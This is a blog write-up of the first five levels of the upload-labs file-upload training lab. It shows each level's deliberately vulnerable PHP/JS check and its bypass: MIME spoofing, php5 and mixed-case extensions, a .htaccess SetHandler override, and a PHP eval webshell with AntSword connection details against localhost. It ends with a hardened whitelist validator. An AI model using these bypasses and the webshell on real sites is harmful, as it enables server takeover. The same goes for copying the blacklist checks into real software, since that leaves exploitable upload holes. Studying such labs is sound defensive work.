upload-labs(1-5)

Created at 2018-07-11 Updated at 2018-07-12 Tag web

lalala

Pass-01:

Pass-01 source:

```javascript
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // define the file types that are allowed to be uploaded
    var allow_ext = ".jpg|.png|.gif";
    // extract the type (extension) of the uploaded file
    var ext_name = file.substring(file.lastIndexOf("."));
    // check whether the uploaded file type is allowed
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}
```

This is JavaScript code; the allowed types are .jpg, .png and .gif files.

Hint:

Client-side JS check

  1. Disable JS and upload the .php file (this is what I used, because I'm lazy)

  2. First rename the file locally to a permitted image extension, then capture the request and change it back to .php

Press F12 to open the inspector and find the upload path

Pass-02:

Pass-02 source:

```php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            // check that the MIME type is jpeg, png or gif
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'],
                $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                // check whether the file was uploaded
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
    }
}
```

Hint:

As the hint says, this is a MIME check

Upload a .php file, capture the request, and change the Content-Type from application/octet-stream to image/jpeg, image/png or image/gif

Upload succeeds

Pass-03:

Pass-03 source:

```php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        // blacklist
        $file_name = trim($_FILES['upload_file']['name']);
        // trim() removes whitespace or other predefined characters from both ends of a string.
        // If the character list is omitted it removes "\0", "\t", "\n", "\x0B" (vertical tab), "\r" and " " (space)
        $file_name = deldot($file_name);
        // delete trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        // from the last '.' in the filename to the end, i.e. the extension
        $file_ext = strtolower($file_ext);
        // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        // remove the string ::$DATA
        $file_ext = trim($file_ext);
        // strip leading/trailing whitespace
        if(!in_array($file_ext, $deny_ext)) {
            // not on the blacklist
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
                // upload path is ****/uploaded filename
                $is_upload = true;
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
```

Blacklist check

The blacklist is '.asp', '.aspx', '.php', '.jsp'
Changing case or appending a space does not work as a bypass; you can use an extension that is not on the blacklist, e.g. php5, php7, etc.; you can also bypass it by using .htaccess to rewrite the file-parsing rules

(The .htaccess file is an Apache configuration file that controls the web configuration of its directory. With .htaccess you can implement 301 redirects, custom 404 error pages, changing how file extensions are handled, allowing/blocking access for specific users or to specific directories, disabling directory listings, configuring default documents, and so on.)

① Bypass with an extension not on the blacklist
Upload a file whose content is <?php @eval($_POST['a']); ?> with its extension changed to php5; after the upload succeeds, connect with AntSword (蚁剑):

shell url: http://127.0.0.1/upload-labs/upload/eval03.php5

shell pwd: a

And then……

② Bypass by rewriting the file-parsing rules with .htaccess:

  1. Create a .htaccess file with the following content:

    <FilesMatch "eval03">
    SetHandler application/x-httpd-php
    </FilesMatch>

  2. Then upload the webshell as eval03.jpg; eval03.jpg will now be parsed as a PHP file.

  3. After the upload succeeds, in AntSword enter http://127.0.0.1/upload-labs/upload/eval03.jpg as the shell url and a as the shell pwd, and then……

Pass-04:

Pass-04 source:

```php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // delete trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
```

Blacklist check

The blacklist has many entries: changing case or appending a space does not work, and changing the extension to php5, php7, etc. does not work either; you can still bypass it by using .htaccess to rewrite the file-parsing rules, as in the previous level

Pass-05:

Pass-05 source:

```php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // delete trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
```

Blacklist check
This time there is no case conversion, so the extension can be changed to mixed case to bypass the check

Upload succeeds

AntSword: shell url: http://127.0.0.1/upload-labs/upload/eval05.PhP

shell pwd: a
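The five levels above fail for the same reason: each one trusts something the client controls (the JS check, the Content-Type header, the filename) and filters with a blacklist. As an added example that is not upload-labs' own code, here is a whitelist-based server-side check that closes all five gaps at once; it assumes PHP 7+, keeps the lab's `$UPLOAD_ADDR` as the upload directory, and the function name `validate_upload` and its messages are mine.

```php
<?php
// Added example, not upload-labs code: whitelist check covering Pass-01 to Pass-05.
// Assumes PHP 7+ and that $UPLOAD_ADDR is the lab's upload directory.

function validate_upload(array $file, $upload_dir) {
    // Pass-01/02: the browser's JS and the request's Content-Type are both
    // attacker-controlled, so neither is consulted here.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return array(false, 'upload failed');
    }

    // Pass-03/04: an allow-list replaces the blacklist, so php5, phtml,
    // .htaccess and anything else not listed is rejected without enumerating it.
    $allowed = array('jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                     'png' => 'image/png',  'gif' => 'image/gif');

    // Pass-05: normalise case before comparing. pathinfo() yields '' for a
    // trailing dot and 'php::$DATA' for the ADS trick; both fail the lookup.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return array(false, 'extension not allowed');
    }

    // Sniff the real media type from the bytes instead of trusting the header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        return array(false, 'content does not match extension');
    }

    // Store under a server-generated name so the user-supplied filename,
    // with whatever tricks it carries, never reaches the filesystem.
    $target = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return array(false, 'could not store file');
    }
    return array(true, $target);
}

$is_upload = false;
$msg = null;
if (isset($_POST['submit']) && isset($_FILES['upload_file'])) {
    list($ok, $info) = validate_upload($_FILES['upload_file'], $UPLOAD_ADDR);
    if ($ok) {
        $is_upload = true;
        $img_path = $info;
    } else {
        $msg = $info;
    }
}
```

Content sniffing alone does not stop a valid image that also contains PHP tags, so the upload directory should additionally never execute scripts: set `AllowOverride None` for it in the main Apache configuration so an uploaded .htaccess (Pass-03/04) is ignored, and disable PHP there (for example `php_flag engine off` under mod_php).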

Site by 9527 using Hexo & Random
